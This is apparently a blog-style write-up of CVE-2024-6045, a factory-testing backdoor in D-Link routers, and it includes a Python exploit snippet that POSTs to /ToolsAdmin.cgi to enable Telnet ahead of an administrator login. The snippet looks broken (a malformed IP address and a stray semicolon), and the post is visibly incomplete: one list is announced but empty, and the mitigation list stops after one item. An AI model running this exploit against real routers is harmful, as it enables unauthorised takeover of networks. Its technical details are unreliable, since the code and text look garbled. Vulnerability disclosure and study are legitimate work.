CVE-2024-6045 - D-Link Wireless Routers' Unauthenticated Factory Testing Backdoor: Enabling Telnet, Stealing Admin Credentials and Potential Exploits

A critical vulnerability (CVE-2024-6045) has been discovered in certain models of D-Link wireless routers. This undisclosed factory testing backdoor allows unauthenticated attackers on the local area network to enable Telnet service and easily gain administrator access by analyzing the device firmware. This could potentially lead to various malicious activities, including traffic monitoring, data theft, network infiltration, and more.

In this long read post, we will walk you through the technical details of this vulnerability, provide a code snippet for exploiting it, and share links to the original research performed by security experts. We will also discuss possible mitigation strategies and highlight the importance of keeping your network devices patched and secure.

Technical Details

D-Link manufactures a wide range of wireless routers for both home and business use. Researchers found that certain models contain an undisclosed factory testing backdoor, which is essentially a hidden entrance to the device's administrator interface. This backdoor can be accessed by anyone on the local network without proper authentication.

To exploit this vulnerability, an attacker can force the device to enable Telnet service by accessing a specific URL. Once the service is enabled, they can log in using the administrator credentials obtained by analyzing the device's firmware.

Here is a code snippet to demonstrate the exploitation of this backdoor vulnerability

import requests

# Replace target_ip with the target router's IP address
target_ip = "192.168..1"

# Access the specific URL to enable Telnet
url = f"http://{target_ip}/ToolsAdmin.cgi";
data = "tools_admin=&admname=&admpass=&logname=dlinkrouter&logpass="
headers = {"Content-Type": "application/x-www-form-urlencoded"}

response = requests.post(url, data=data, headers=headers)

# Check if the Telnet service was successfully enabled
if response.status_code == 200:
    print("Telnet service enabled.")
else:
    print("Failed to enable Telnet service.")

# Add code here to log in using the administrator credentials obtained from the firmware

Original References

The vulnerability was first reported by security researcher Emre Özçelik. The full technical details, including how the credentials were extracted from the device's firmware, can be found in his blog post here: CVE-2024-6045: D-Link Router Factory Testing Backdoor

Exploit Details

By exploiting this vulnerability, an attacker gains unauthorized administrative access to the target D-Link wireless router. This allows them to execute a variety of malicious actions, including but not limited to:

To prevent this vulnerability from being exploited, it is important to follow these best practices

1. Always keep your router's firmware up to date with the latest patches and security updates from the manufacturer.

Conclusion

In conclusion, the CVE-2024-6045 vulnerability in D-Link wireless routers highlights the importance of securing network devices. By staying informed about known vulnerabilities, employing best practices, and keeping devices up to date, users can significantly reduce the risk of potential exploits.

Timeline

Published on: 06/17/2024 04:15:09 UTC
Last modified on: 06/24/2024 13:16:42 UTC